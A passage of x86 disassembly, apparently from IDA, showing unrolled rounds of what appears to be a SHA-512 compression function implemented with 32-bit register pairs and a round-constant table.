add ecx, [esp+170h+var_B8]
adc edx, [esp+170h+var_B4]
mov [eax+68h], ecx
mov [eax+6Ch], edx
mov eax, edx
mov [esp+170h+var_B8], ecx
mov [esp+170h+var_B4], eax
mov [esp+170h+var_38], ecx
jmp short loc_414CFF
; ---------------------------------------------------------------------------
loc_414CEA: ; CODE XREF: sub_4143D0+82F�j
mov edx, [esp+170h+var_B8]
mov eax, [esp+170h+var_B4]
mov [esp+170h+var_38], edx
loc_414CFF: ; CODE XREF: sub_4143D0+918�j
mov ecx, [esp+170h+var_14C]
mov ebx, ecx
mov [esp+170h+var_34], eax
mov eax, [esp+170h+var_150]
xor esi, esi
mov edx, ecx
mov edi, eax
shld ebx, edi, 17h
or esi, ebx
shl edi, 17h
xor ebx, ebx
shr edx, 9
or edx, edi
mov ebp, eax
shrd ebp, ecx, 12h
or ebx, ebp
mov ebp, [esp+170h+var_14C]
xor edx, ebx
shr ecx, 12h
mov edi, eax
shl edi, 0Eh
or edi, ecx
xor esi, edi
mov ebx, eax
shrd ebx, ebp, 0Eh
xor edi, edi
or edi, ebx
xor edx, edi
shr ebp, 0Eh
mov ecx, eax
shl ecx, 12h
or ecx, ebp
mov ebp, [esp+170h+var_148]
xor esi, ecx
mov ecx, [esp+170h+var_14C]
and ebp, eax
mov edi, eax
mov eax, [esp+170h+var_144]
and eax, ecx
mov ebx, ecx
mov ecx, [esp+170h+var_134]
not ebx
and ebx, [esp+170h+var_13C]
not edi
and edi, [esp+170h+var_140]
xor ebx, eax
mov eax, [esp+170h+var_15C]
xor edi, ebp
add edx, edi
adc esi, ebx
add edx, ds:dword_41F968[eax*8]
adc esi, ds:dword_41F96C[eax*8]
add edx, [esp+170h+var_38]
mov eax, [esp+170h+var_138]
adc esi, [esp+170h+var_34]
add eax, edx
adc ecx, esi
add [esp+170h+var_158], eax
mov [esp+170h+var_134], ecx
mov [esp+170h+var_138], eax
adc [esp+170h+var_154], ecx
mov ecx, [esp+170h+var_130]
mov eax, [esp+170h+var_12C]
mov edx, ecx
mov ebx, eax
shrd edx, ebx, 1Ch
mov esi, ecx
mov ebp, eax
shld ebp, ecx, 1Eh
xor edi, edi
or edi, edx
shr ebx, 1Ch
shl esi, 4
or esi, ebx
mov edx, eax
shr edx, 2
shl ecx, 1Eh
xor ebx, ebx
or edx, ecx
or ebx, ebp
xor edi, edx
xor esi, ebx
mov ebx, [esp+170h+var_130]
xor edx, edx
mov ebp, eax
shld ebp, ebx, 19h
or edx, ebp
mov ebp, [esp+170h+var_124]
shl ebx, 19h
xor esi, edx
mov edx, [esp+170h+var_128]
mov ecx, eax
shr ecx, 7
or ecx, ebx
xor edi, ecx
mov ecx, [esp+170h+var_130]
mov ebx, edx
xor ebx, ecx
and ebx, [esp+170h+var_120]
and edx, ecx
mov ecx, [esp+170h+var_124]
xor ebp, eax
and ebp, [esp+170h+var_11C]
and ecx, eax
xor ebx, edx
xor ebp, ecx
add edi, ebx
adc esi, ebp
add [esp+170h+var_138], edi
adc [esp+170h+var_134], esi
cmp [esp+170h+var_15C], 0
jz loc_414F30
mov eax, [esp+170h+var_D0]
mov ecx, [esp+170h+var_CC]
mov ebx, ecx
mov edi, eax
shrd edi, ebx, 8
mov ebp, eax
shrd ebp, ecx, 1
xor esi, esi
or esi, edi
shr ecx, 1
mov edi, eax
mov edx, eax
shr ebx, 8
shl edi, 1Fh
or edi, ecx
mov ecx, [esp+170h+var_CC]
shrd eax, ecx, 7
shl edx, 18h
or edx, ebx
xor ebx, ebx
or ebx, ebp
xor esi, ebx
xor esi, eax
mov eax, [esp+170h+var_108]
xor edx, edi
shr ecx, 7
xor edx, ecx
mov ecx, [esp+170h+var_104]
mov ebx, eax
mov ebp, ecx
shrd ebx, ebp, 13h
xor edi, edi
or edi, ebx
mov ebx, ecx
mov [esp+170h+var_160], esi
mov esi, eax
shld ecx, eax, 3
add eax, eax
add eax, eax
shl esi, 0Dh
shr ebp, 13h
or esi, ebp
add eax, eax
shr ebx, 1Dh
or ebx, eax
mov eax, [esp+170h+var_108]
xor ebp, ebp
or ebp, ecx
mov ecx, [esp+170h+var_104]
shrd eax, ecx, 6
shr ecx, 6
xor esi, ebp
xor edi, ebx
xor esi, ecx
mov ecx, [esp+170h+var_160]
xor edi, eax
mov eax, [esp+170h+arg_0]
add ecx, edi
adc edx, esi
add ecx, [esp+170h+var_C0]
adc edx, [esp+170h+var_BC]
add ecx, [esp+170h+var_A8]
adc edx, [esp+170h+var_A4]
mov [eax+70h], ecx
mov [eax+74h], edx
mov eax, edx
mov [esp+170h+var_A8], ecx
mov [esp+170h+var_A4], eax
mov [esp+170h+var_88], ecx
jmp short loc_414F45
; ---------------------------------------------------------------------------
loc_414F30: ; CODE XREF: sub_4143D0+A75�j
mov edx, [esp+170h+var_A8]
mov eax, [esp+170h+var_A4]
mov [esp+170h+var_88], edx
loc_414F45: ; CODE XREF: sub_4143D0+B5E�j
mov ecx, [esp+170h+var_154]
mov [esp+170h+var_84], eax
mov eax, [esp+170h+var_158]
mov ebx, ecx
xor esi, esi
mov edi, eax
shld ebx, edi, 17h
or esi, ebx
shl edi, 17h
mov edx, ecx
shr edx, 9
or edx, edi
mov ebp, eax
shrd ebp, ecx, 12h
xor ebx, ebx
or ebx, ebp
mov ebp, [esp+170h+var_154]
xor edx, ebx
shr ecx, 12h
mov edi, eax
shl edi, 0Eh
or edi, ecx
xor esi, edi
mov ebx, eax
shrd ebx, ebp, 0Eh
xor edi, edi
or edi, ebx
xor edx, edi
mov ecx, eax
shl ecx, 12h
shr ebp, 0Eh
or ecx, ebp
mov ebp, [esp+170h+var_150]
xor esi, ecx
mov ecx, [esp+170h+var_154]
and ebp, eax
mov edi, eax
mov eax, [esp+170h+var_14C]
and eax, ecx
mov ebx, ecx
mov ecx, [esp+170h+var_13C]
not edi
and edi, [esp+170h+var_148]
not ebx
and ebx, [esp+170h+var_144]
xor edi, ebp
xor ebx, eax
mov eax, [esp+170h+var_15C]
add edx, edi
adc esi, ebx
add edx, ds:dword_41F970[eax*8]
mov edi, [esp+170h+var_12C]
adc esi, ds:dword_41F974[eax*8]
add edx, [esp+170h+var_88]
mov eax, [esp+170h+var_140]
adc esi, [esp+170h+var_84]
add eax, edx
adc ecx, esi
add [esp+170h+var_120], eax
mov esi, [esp+170h+var_130]
mov [esp+170h+var_140], eax
adc [esp+170h+var_11C], ecx
mov [esp+170h+var_13C], ecx
mov ecx, [esp+170h+var_138]
mov eax, esi
xor eax, ecx
mov [esp+170h+var_98], eax
mov eax, [esp+170h+var_134]
mov edx, edi
xor edx, eax
mov [esp+170h+var_94], edx
mov edx, esi
and edx, ecx
mov [esp+170h+var_90], edx
mov edx, edi
and edx, eax
mov [esp+170h+var_8C], edx
mov edx, ecx
xor esi, esi
shl edx, 4
mov edi, ecx
mov ebx, eax
shrd edi, ebx, 1Ch
shr ebx, 1Ch
or edx, ebx
or esi, edi
mov ebp, eax
shld ebp, ecx, 1Eh
xor ebx, ebx
shl ecx, 1Eh
or ebx, ebp
mov edi, eax
xor edx, ebx
mov ebx, [esp+170h+var_138]
shr edi, 2
or edi, ecx
mov ecx, eax
shld eax, ebx, 19h
xor esi, edi
shr ecx, 7
xor edi, edi
or edi, eax
mov eax, [esp+170h+var_98]
and eax, [esp+170h+var_128]
shl ebx, 19h
xor eax, [esp+170h+var_90]
or ecx, ebx
xor esi, ecx
mov ecx, [esp+170h+var_94]
and ecx, [esp+170h+var_124]
xor edx, edi
xor ecx, [esp+170h+var_8C]
add esi, eax
adc edx, ecx
add [esp+170h+var_140], esi
adc [esp+170h+var_13C], edx
cmp [esp+170h+var_15C], 0
jz loc_4151B2
mov eax, [esp+170h+var_B8]
mov ecx, [esp+170h+var_B4]
mov ebx, ecx
mov edi, eax
shrd edi, ebx, 13h
xor esi, esi
or esi, edi
mov edi, ecx
shr ebx, 13h
mov edx, eax
mov ebp, eax
shld ecx, ebp, 3
shl edx, 0Dh
or edx, ebx
xor ebx, ebx
or ebx, ecx
mov ecx, [esp+170h+var_B4]
shrd eax, ecx, 6
add ebp, ebp
add ebp, ebp
add ebp, ebp
shr edi, 1Dh
or edi, ebp
xor esi, edi
xor esi, eax
mov eax, [esp+170h+var_D8]
xor edx, ebx
shr ecx, 6
xor edx, ecx
mov ecx, [esp+170h+var_D4]
mov ebp, ecx
mov ebx, eax
shrd ebx, ebp, 8
xor edi, edi
or edi, ebx
mov [esp+170h+var_160], esi
mov esi, eax
mov ebx, eax
shrd eax, ecx, 1
shl esi, 18h
shr ebp, 8
or esi, ebp
shr ecx, 1
xor ebp, ebp
or ebp, eax
mov eax, [esp+170h+var_D8]
shl ebx, 1Fh
or ebx, ecx
mov ecx, [esp+170h+var_D4]
shrd eax, ecx, 7
shr ecx, 7
xor esi, ebx
xor edi, ebp
xor esi, ecx
mov ecx, [esp+170h+var_160]
xor edi, eax
mov eax, [esp+170h+arg_0]
add ecx, edi
adc edx, esi
add ecx, [esp+170h+var_D0]
adc edx, [esp+170h+var_CC]
add ecx, [esp+170h+var_A0]
adc edx, [esp+170h+var_9C]
mov [eax+78h], ecx
mov [eax+7Ch], edx
mov eax, edx
mov [esp+170h+var_D0], ecx
mov [esp+170h+var_CC], eax
mov [esp+170h+var_60], ecx
jmp short loc_4151C7
; ---------------------------------------------------------------------------
loc_4151B2: ; CODE XREF: sub_4143D0+CEB�j
mov edx, [esp+170h+var_D0]
mov eax, [esp+170h+var_CC]
mov [esp+170h+var_60], edx
loc_4151C7: ; CODE XREF: sub_4143D0+DE0�j
mov ecx, [esp+170h+var_11C]
mov ebx, ecx
mov [esp+170h+var_5C], eax
mov eax, [esp+170h+var_120]
xor esi, esi
mov edx, ecx
mov edi, eax
shld ebx, edi, 17h
or esi, ebx
shl edi, 17h
xor ebx, ebx
shr edx, 9
or edx, edi
mov ebp, eax
shrd ebp, ecx, 12h
or ebx, ebp
mov ebp, [esp+170h+var_11C]
xor edx, ebx
shr ecx, 12h
mov edi, eax
shl edi, 0Eh
or edi, ecx
xor esi, edi
mov ebx, eax
shrd ebx, ebp, 0Eh
shr ebp, 0Eh
xor edi, edi
or edi, ebx
xor edx, edi
mov ecx, eax
shl ecx, 12h
or ecx, ebp
mov ebp, [esp+170h+var_158]
xor esi, ecx
mov ecx, [esp+170h+var_11C]
and ebp, eax
mov edi, eax
mov eax, [esp+170h+var_154]
and eax, ecx
mov ebx, ecx
mov ecx, [esp+170h+var_148]
not ebx
and ebx, [esp+170h+var_14C]
not edi
and edi, [esp+170h+var_150]
xor ebx, eax
mov eax, [esp+170h+var_15C]
xor edi, ebp
add edx, edi
adc esi, ebx
add edx, ds:dword_41F978[eax*8]
adc esi, ds:dword_41F97C[eax*8]
add edx, [esp+170h+var_60]
mov eax, [esp+170h+var_128]
adc esi, [esp+170h+var_5C]
add ecx, edx
mov edx, [esp+170h+var_144]
adc edx, esi
add eax, ecx
adc [esp+170h+var_124], edx
mov [esp+170h+var_148], ecx
mov ecx, [esp+170h+var_140]
mov [esp+170h+var_144], edx
mov edx, [esp+170h+var_13C]
mov ebx, ecx
mov ebp, edx
shrd ebx, ebp, 1Ch
xor edi, edi
or edi, ebx
mov esi, ecx
mov ebx, edx
shld edx, ecx, 1Eh
shr ebp, 1Ch
shl esi, 4
or esi, ebp
shr ebx, 2
shl ecx, 1Eh
xor ebp, ebp
or ebx, ecx
mov [esp+170h+var_128], eax
or ebp, edx
mov ecx, [esp+170h+var_13C]
xor esi, ebp
mov ebp, [esp+170h+var_140]
mov edx, ecx
shld ecx, ebp, 19h
xor edi, ebx
shr edx, 7
xor ebx, ebx
or ebx, ecx
mov ecx, [esp+170h+var_98]
and ecx, [esp+170h+var_140]
shl ebp, 19h
xor ecx, [esp+170h+var_90]
or edx, ebp
xor edi, edx
mov edx, [esp+170h+var_94]
and edx, [esp+170h+var_13C]
xor esi, ebx
xor edx, [esp+170h+var_8C]
add edi, ecx
adc esi, edx
add [esp+170h+var_148], edi
adc [esp+170h+var_144], esi
cmp [esp+170h+var_15C], 0
jz loc_41540D
mov eax, [esp+170h+var_A8]
mov ecx, [esp+170h+var_A4]
mov ebx, ecx
mov edi, eax
shrd edi, ebx, 13h
xor esi, esi
or esi, edi
mov edi, ecx
shr ebx, 13h
mov edx, eax
mov ebp, eax
shld ecx, ebp, 3
shl edx, 0Dh
or edx, ebx
xor ebx, ebx
or ebx, ecx
mov ecx, [esp+170h+var_A4]
shrd eax, ecx, 6
add ebp, ebp
add ebp, ebp
add ebp, ebp
shr edi, 1Dh
or edi, ebp
xor esi, edi
xor esi, eax
mov eax, [esp+170h+var_118]
xor edx, ebx
shr ecx, 6
xor edx, ecx
mov ecx, [esp+170h+var_114]
mov ebp, ecx
mov ebx, eax
shrd ebx, ebp, 8
xor edi, edi
or edi, ebx
mov [esp+170h+var_160], esi
mov esi, eax
mov ebx, eax
shrd eax, ecx, 1
shl esi, 18h
shr ebp, 8
or esi, ebp
shr ecx, 1
xor ebp, ebp
or ebp, eax
mov eax, [esp+170h+var_118]
shl ebx, 1Fh
or ebx, ecx
mov ecx, [esp+170h+var_114]
shrd eax, ecx, 7
shr ecx, 7
xor esi, ebx
xor edi, ebp
xor edi, eax
mov eax, [esp+170h+arg_0]
xor esi, ecx
mov ecx, [esp+170h+var_160]
add ecx, edi
adc edx, esi
add ecx, [esp+170h+var_D8]
adc edx, [esp+170h+var_D4]
add ecx, [esp+170h+var_E0]
adc edx, [esp+170h+var_DC]
mov [eax+80h], ecx
mov [eax+84h], edx
mov eax, edx
mov [esp+170h+var_D4], eax
mov [esp+170h+var_14], eax
mov eax, [esp+170h+var_128]
mov [esp+170h+var_D8], ecx
mov [esp+170h+var_18], ecx
jmp short loc_415429
; ---------------------------------------------------------------------------
loc_41540D: ; CODE XREF: sub_4143D0+F41�j
mov edx, [esp+170h+var_D8]
mov ecx, [esp+170h+var_D4]
mov [esp+170h+var_18], edx
mov [esp+170h+var_14], ecx
loc_415429: ; CODE XREF: sub_4143D0+103B�j
mov ecx, [esp+170h+var_124]
mov ebx, ecx
xor esi, esi
mov edx, ecx
mov edi, eax
shld ebx, edi, 17h
or esi, ebx
shl edi, 17h
xor ebx, ebx
shr edx, 9
or edx, edi
mov ebp, eax
shrd ebp, ecx, 12h
or ebx, ebp
mov ebp, [esp+170h+var_124]
xor edx, ebx
shr ecx, 12h
mov edi, eax
shl edi, 0Eh
or edi, ecx
xor esi, edi
mov ebx, eax
shrd ebx, ebp, 0Eh
xor edi, edi
or edi, ebx
xor edx, edi
shr ebp, 0Eh
mov ecx, eax
shl ecx, 12h
or ecx, ebp
mov ebp, [esp+170h+var_120]
xor esi, ecx
mov ecx, [esp+170h+var_124]
and ebp, eax
mov edi, eax
mov eax, [esp+170h+var_11C]
and eax, ecx
mov ebx, ecx
mov ecx, [esp+170h+var_14C]
not ebx
and ebx, [esp+170h+var_154]
not edi
and edi, [esp+170h+var_158]
xor ebx, eax
mov eax, [esp+170h+var_15C]
xor edi, ebp
add edx, edi
adc esi, ebx
add edx, ds:dword_41F980[eax*8]
adc esi, ds:dword_41F984[eax*8]
add edx, [esp+170h+var_18]
mov eax, [esp+170h+var_150]
adc esi, [esp+170h+var_14]
add eax, edx
adc ecx, esi
add [esp+170h+var_130], eax
mov [esp+170h+var_14C], ecx
mov [esp+170h+var_150], eax
adc [esp+170h+var_12C], ecx
mov eax, [esp+170h+var_144]
mov ecx, [esp+170h+var_148]
mov edx, ecx
mov ebx, eax
shrd edx, ebx, 1Ch
mov esi, ecx
xor edi, edi
or edi, edx
mov ebp, eax
shld ebp, ecx, 1Eh
shr ebx, 1Ch
shl esi, 4
or esi, ebx
mov edx, eax
shl ecx, 1Eh
shr edx, 2
xor ebx, ebx
or edx, ecx
or ebx, ebp
xor edi, edx
xor esi, ebx
mov ecx, eax
mov ebx, [esp+170h+var_148]
mov ebp, eax
shld ebp, ebx, 19h
xor edx, edx
or edx, ebp
mov ebp, [esp+170h+var_13C]
xor ebp, [esp+170h+var_134]
shl ebx, 19h
shr ecx, 7
or ecx, ebx
xor esi, edx
mov edx, [esp+170h+var_140]
xor edi, ecx
mov ecx, [esp+170h+var_138]
and ebp, eax
mov eax, [esp+170h+var_13C]
and eax, [esp+170h+var_134]
mov ebx, edx
xor ebx, ecx
and ebx, [esp+170h+var_148]
and edx, ecx
xor ebx, edx
xor ebp, eax
add edi, ebx
adc esi, ebp
add [esp+170h+var_150], edi
adc [esp+170h+var_14C], esi
cmp [esp+170h+var_15C], 0
jz loc_415651
mov eax, [esp+170h+var_C8]
mov ecx, [esp+170h+var_C4]
mov ebx, ecx
mov edi, eax
shrd edi, ebx, 8
mov ebp, eax
shrd ebp, ecx, 1
xor esi, esi
or esi, edi
shr ecx, 1
mov edi, eax
mov edx, eax
shr ebx, 8
shl edi, 1Fh
or edi, ecx
mov ecx, [esp+170h+var_C4]
shrd eax, ecx, 7
shl edx, 18h
or edx, ebx
xor ebx, ebx
or ebx, ebp
xor esi, ebx
xor esi, eax
mov eax, [esp+170h+var_D0]
xor edx, edi
shr ecx, 7
xor edx, ecx
mov ecx, [esp+170h+var_CC]
mov ebx, eax
mov ebp, ecx
shrd ebx, ebp, 13h
xor edi, edi
or edi, ebx
mov ebx, ecx
mov [esp+170h+var_160], esi
mov esi, eax
shld ecx, eax, 3
add eax, eax
add eax, eax
shl esi, 0Dh
shr ebp, 13h
or esi, ebp
add eax, eax
shr ebx, 1Dh
or ebx, eax
mov eax, [esp+170h+var_D0]
xor ebp, ebp
or ebp, ecx
mov ecx, [esp+170h+var_CC]
shrd eax, ecx, 6
shr ecx, 6
xor esi, ebp
xor edi, ebx
xor esi, ecx
mov ecx, [esp+170h+var_160]
xor edi, eax
mov eax, [esp+170h+arg_0]
add ecx, edi
adc edx, esi
add ecx, [esp+170h+var_118]
adc edx, [esp+170h+var_114]
add ecx, [esp+170h+var_100]
adc edx, [esp+170h+var_FC]
mov [eax+88h], ecx
mov [eax+8Ch], edx
mov eax, edx
mov [esp+170h+var_118], ecx
mov [esp+170h+var_114], eax
mov [esp+170h+var_48], ecx
jmp short loc_415660
; ---------------------------------------------------------------------------
loc_415651: ; CODE XREF: sub_4143D0+1196�j
mov edx, [esp+170h+var_118]
mov eax, [esp+170h+var_114]
mov [esp+170h+var_48], edx
loc_415660: ; CODE XREF: sub_4143D0+127F�j
mov ecx, [esp+170h+var_12C]
mov ebx, ecx
mov [esp+170h+var_44], eax
mov eax, [esp+170h+var_130]
xor esi, esi
mov edx, ecx
mov edi, eax
shld ebx, edi, 17h
or esi, ebx
shl edi, 17h
xor ebx, ebx
shr edx, 9
or edx, edi
mov ebp, eax
shrd ebp, ecx, 12h
or ebx, ebp
mov ebp, [esp+170h+var_12C]
xor edx, ebx
shr ecx, 12h
mov edi, eax
shl edi, 0Eh
or edi, ecx
xor esi, edi
mov ebx, eax
shrd ebx, ebp, 0Eh
xor edi, edi
or edi, ebx
xor edx, edi
shr ebp, 0Eh
mov ecx, eax
shl ecx, 12h
or ecx, ebp
mov ebp, [esp+170h+var_128]
xor esi, ecx
mov ecx, [esp+170h+var_12C]
and ebp, eax
mov edi, eax
mov eax, [esp+170h+var_124]
and eax, ecx
mov ebx, ecx
mov ecx, [esp+170h+var_154]
not ebx
and ebx, [esp+170h+var_11C]
not edi
and edi, [esp+170h+var_120]
xor ebx, eax
mov eax, [esp+170h+var_15C]
xor edi, ebp
add edx, edi
adc esi, ebx
add edx, ds:dword_41F988[eax*8]
adc esi, ds:dword_41F98C[eax*8]
add edx, [esp+170h+var_48]
mov eax, [esp+170h+var_158]
adc esi, [esp+170h+var_44]
add eax, edx
adc ecx, esi
add [esp+170h+var_138], eax
mov [esp+170h+var_154], ecx
mov [esp+170h+var_158], eax
adc [esp+170h+var_134], ecx
mov ecx, [esp+170h+var_150]
mov eax, [esp+170h+var_14C]
mov edx, ecx
mov ebx, eax
shrd edx, ebx, 1Ch
mov esi, ecx
mov ebp, eax
shld ebp, ecx, 1Eh
xor edi, edi
or edi, edx
shr ebx, 1Ch
shl esi, 4
or esi, ebx
mov edx, eax
shr edx, 2
shl ecx, 1Eh
xor ebx, ebx
or edx, ecx
or ebx, ebp
xor edi, edx
xor esi, ebx
mov ebx, [esp+170h+var_150]
mov ebp, eax
shld ebp, ebx, 19h
shl ebx, 19h
mov ecx, eax
shr ecx, 7
or ecx, ebx
xor edx, edx
or edx, ebp
xor edi, ecx
mov ecx, [esp+170h+var_150]
xor esi, edx
mov edx, [esp+170h+var_140]
mov ebx, ecx
xor ebx, edx
and ebx, [esp+170h+var_148]
mov ebp, eax
xor ebp, [esp+170h+var_13C]
and eax, [esp+170h+var_13C]
and ebp, [esp+170h+var_144]
and ecx, edx
xor ebx, ecx
xor ebp, eax
add edi, ebx
adc esi, ebp
add [esp+170h+var_158], edi
adc [esp+170h+var_154], esi
cmp [esp+170h+var_15C], 0
jz loc_41589B
mov eax, [esp+170h+var_D8]
mov ecx, [esp+170h+var_D4]
mov ebx, ecx
mov edi, eax
shrd edi, ebx, 13h
xor esi, esi
or esi, edi
mov edi, ecx
shr ebx, 13h
mov edx, eax
mov ebp, eax
shld ecx, ebp, 3
shl edx, 0Dh
or edx, ebx
xor ebx, ebx
or ebx, ecx
mov ecx, [esp+170h+var_D4]
shrd eax, ecx, 6
add ebp, ebp
add ebp, ebp
add ebp, ebp
shr edi, 1Dh
or edi, ebp
xor esi, edi
xor esi, eax
mov eax, [esp+170h+var_F0]
xor edx, ebx
shr ecx, 6
xor edx, ecx
mov ecx, [esp+170h+var_EC]
mov ebp, ecx
mov ebx, eax
shrd ebx, ebp, 8
xor edi, edi
or edi, ebx
mov [esp+170h+var_160], esi
mov esi, eax
mov ebx, eax
shrd eax, ecx, 1
shl esi, 18h
shr ebp, 8
or esi, ebp
shr ecx, 1
xor ebp, ebp
or ebp, eax
mov eax, [esp+170h+var_F0]
shl ebx, 1Fh
or ebx, ecx
mov ecx, [esp+170h+var_EC]
shrd eax, ecx, 7
shr ecx, 7
xor esi, ebx
xor edi, ebp
xor esi, ecx
mov ecx, [esp+170h+var_160]
xor edi, eax
mov eax, [esp+170h+arg_0]
add ecx, edi
adc edx, esi
add ecx, [esp+170h+var_C8]
adc edx, [esp+170h+var_C4]
add ecx, [esp+170h+var_110]
adc edx, [esp+170h+var_10C]
mov [eax+90h], ecx
mov [eax+94h], edx
mov eax, edx
mov [esp+170h+var_C8], ecx
mov [esp+170h+var_C4], eax
mov [esp+170h+var_80], ecx
jmp short loc_4158B0
; ---------------------------------------------------------------------------
loc_41589B: ; CODE XREF: sub_4143D0+13D4�j
mov edx, [esp+170h+var_C8]
mov eax, [esp+170h+var_C4]
mov [esp+170h+var_80], edx
loc_4158B0: ; CODE XREF: sub_4143D0+14C9�j
mov ecx, [esp+170h+var_134]
mov ebx, ecx
mov [esp+170h+var_7C], eax
mov eax, [esp+170h+var_138]
xor esi, esi
mov edx, ecx
mov edi, eax
shld ebx, edi, 17h
or esi, ebx
shl edi, 17h
xor ebx, ebx
shr edx, 9
or edx, edi
mov ebp, eax
shrd ebp, ecx, 12h
or ebx, ebp
mov ebp, [esp+170h+var_134]
xor edx, ebx
shr ecx, 12h
mov edi, eax
shl edi, 0Eh
or edi, ecx
xor esi, edi
mov ebx, eax
shrd ebx, ebp, 0Eh
xor edi, edi
or edi, ebx
xor edx, edi
shr ebp, 0Eh
mov ecx, eax
shl ecx, 12h
or ecx, ebp
mov ebp, [esp+170h+var_130]
xor esi, ecx
mov ecx, [esp+170h+var_134]
and ebp, eax
mov edi, eax
mov eax, [esp+170h+var_12C]
and eax, ecx
mov ebx, ecx
mov ecx, [esp+170h+var_11C]
not ebx
and ebx, [esp+170h+var_124]
not edi
and edi, [esp+170h+var_128]
xor ebx, eax
mov eax, [esp+170h+var_15C]
xor edi, ebp
add edx, edi
adc esi, ebx
add edx, ds:dword_41F990[eax*8]
adc esi, ds:dword_41F994[eax*8]
add edx, [esp+170h+var_80]
mov eax, [esp+170h+var_120]
adc esi, [esp+170h+var_7C]
add eax, edx
adc ecx, esi
add [esp+170h+var_140], eax
mov [esp+170h+var_11C], ecx
mov [esp+170h+var_120], eax
adc [esp+170h+var_13C], ecx
mov ecx, [esp+170h+var_158]
mov eax, [esp+170h+var_154]
mov edx, ecx
mov ebx, eax
shrd edx, ebx, 1Ch
mov esi, ecx
mov ebp, eax
shld ebp, ecx, 1Eh
xor edi, edi
or edi, edx
shr ebx, 1Ch
shl esi, 4
or esi, ebx
mov edx, eax
shr edx, 2
shl ecx, 1Eh
xor ebx, ebx
or edx, ecx
or ebx, ebp
xor edi, edx
xor esi, ebx
mov ebx, [esp+170h+var_158]
xor edx, edx
mov ebp, eax
shld ebp, ebx, 19h
or edx, ebp
mov ebp, [esp+170h+var_14C]
shl ebx, 19h
xor esi, edx
mov edx, [esp+170h+var_150]
mov ecx, eax
shr ecx, 7
or ecx, ebx
xor edi, ecx
mov ecx, [esp+170h+var_158]
mov ebx, edx
xor ebx, ecx
and ebx, [esp+170h+var_148]
and edx, ecx
mov ecx, [esp+170h+var_14C]
xor ebp, eax
and ebp, [esp+170h+var_144]
and ecx, eax
xor ebx, edx
xor ebp, ecx
add edi, ebx
adc esi, ebp
add [esp+170h+var_120], edi
adc [esp+170h+var_11C], esi
cmp [esp+170h+var_15C], 0
jz loc_415AE1
mov eax, [esp+170h+var_E8]
mov ecx, [esp+170h+var_E4]
mov ebx, ecx
mov edi, eax
shrd edi, ebx, 8
mov ebp, eax
shrd ebp, ecx, 1
xor esi, esi
or esi, edi
shr ecx, 1
mov edi, eax
mov edx, eax
shr ebx, 8
shl edi, 1Fh
or edi, ecx
mov ecx, [esp+170h+var_E4]
shrd eax, ecx, 7
shl edx, 18h
or edx, ebx
xor ebx, ebx
or ebx, ebp
xor esi, ebx
xor esi, eax
mov eax, [esp+170h+var_118]
xor edx, edi
shr ecx, 7
xor edx, ecx
mov ecx, [esp+170h+var_114]
mov ebx, eax
mov ebp, ecx
shrd ebx, ebp, 13h
xor edi, edi
or edi, ebx
mov ebx, ecx
mov [esp+170h+var_160], esi
mov esi, eax
shld ecx, eax, 3
add eax, eax
add eax, eax
shl esi, 0Dh
shr ebp, 13h
or esi, ebp
add eax, eax
shr ebx, 1Dh
or ebx, eax
mov eax, [esp+170h+var_118]
xor ebp, ebp
or ebp, ecx
mov ecx, [esp+170h+var_114]
shrd eax, ecx, 6
shr ecx, 6
xor esi, ebp
xor edi, ebx
xor esi, ecx
mov ecx, [esp+170h+var_160]
xor edi, eax
mov eax, [esp+170h+arg_0]
add ecx, edi
adc edx, esi
add ecx, [esp+170h+var_108]
adc edx, [esp+170h+var_104]
add ecx, [esp+170h+var_F0]
adc edx, [esp+170h+var_EC]
mov [eax+98h], ecx
mov [eax+9Ch], edx
mov eax, edx
mov [esp+170h+var_F0], ecx
mov [esp+170h+var_EC], eax
mov [esp+170h+var_78], ecx
jmp short loc_415AF6
; ---------------------------------------------------------------------------
loc_415AE1: ; CODE XREF: sub_4143D0+1626�j
mov edx, [esp+170h+var_F0]
mov eax, [esp+170h+var_EC]
mov [esp+170h+var_78], edx
loc_415AF6: ; CODE XREF: sub_4143D0+170F�j
mov ecx, [esp+170h+var_13C]
mov ebx, ecx
mov [esp+170h+var_74], eax
mov eax, [esp+170h+var_140]
mov edx, ecx
xor esi, esi
shr edx, 9
mov edi, eax
shld ebx, edi, 17h
or esi, ebx
shl edi, 17h
or edx, edi
xor ebx, ebx
mov ebp, eax
shrd ebp, ecx, 12h
or ebx, ebp
mov ebp, [esp+170h+var_13C]
xor edx, ebx
shr ecx, 12h
mov edi, eax
shl edi, 0Eh
or edi, ecx
xor esi, edi
xor edi, edi
mov ebx, eax
shrd ebx, ebp, 0Eh
or edi, ebx
xor edx, edi
shr ebp, 0Eh
mov ecx, eax
shl ecx, 12h
or ecx, ebp
xor esi, ecx
mov ecx, [esp+170h+var_13C]
mov ebx, ecx
and ecx, [esp+170h+var_134]
mov edi, eax
and eax, [esp+170h+var_138]
not ebx
and ebx, [esp+170h+var_12C]
not edi
and edi, [esp+170h+var_130]
xor ebx, ecx
mov ecx, [esp+170h+var_124]
xor edi, eax
mov eax, [esp+170h+var_15C]
add edx, edi
adc esi, ebx
add edx, ds:dword_41F998[eax*8]
adc esi, ds:dword_41F99C[eax*8]
add edx, [esp+170h+var_78]
mov eax, [esp+170h+var_128]
adc esi, [esp+170h+var_74]
add eax, edx
adc ecx, esi
add [esp+170h+var_148], eax
mov [esp+170h+var_124], ecx
mov [esp+170h+var_128], eax
adc [esp+170h+var_144], ecx
mov eax, [esp+170h+var_11C]
mov ecx, [esp+170h+var_120]
mov edx, ecx
mov ebx, eax
shrd edx, ebx, 1Ch
mov esi, ecx
xor edi, edi
or edi, edx
mov ebp, eax
shld ebp, ecx, 1Eh
shr ebx, 1Ch
shl esi, 4
or esi, ebx
mov edx, eax
shl ecx, 1Eh
shr edx, 2
xor ebx, ebx
or edx, ecx
or ebx, ebp
xor edi, edx
xor esi, ebx
mov ecx, eax
mov ebx, [esp+170h+var_120]
xor edx, edx
mov ebp, eax
shld ebp, ebx, 19h
or edx, ebp
mov ebp, [esp+170h+var_154]
shl ebx, 19h
shr ecx, 7
or ecx, ebx
xor esi, edx
mov edx, [esp+170h+var_158]
xor edi, ecx
mov ecx, [esp+170h+var_120]
mov ebx, edx
xor ebx, ecx
and ebx, [esp+170h+var_150]
and edx, ecx
mov ecx, [esp+170h+var_154]
xor ebp, eax
and ebp, [esp+170h+var_14C]
and ecx, eax
xor ebx, edx
xor ebp, ecx
add edi, ebx
adc esi, ebp
add [esp+170h+var_128], edi
adc [esp+170h+var_124], esi
cmp [esp+170h+var_15C], 0
jz loc_415D29
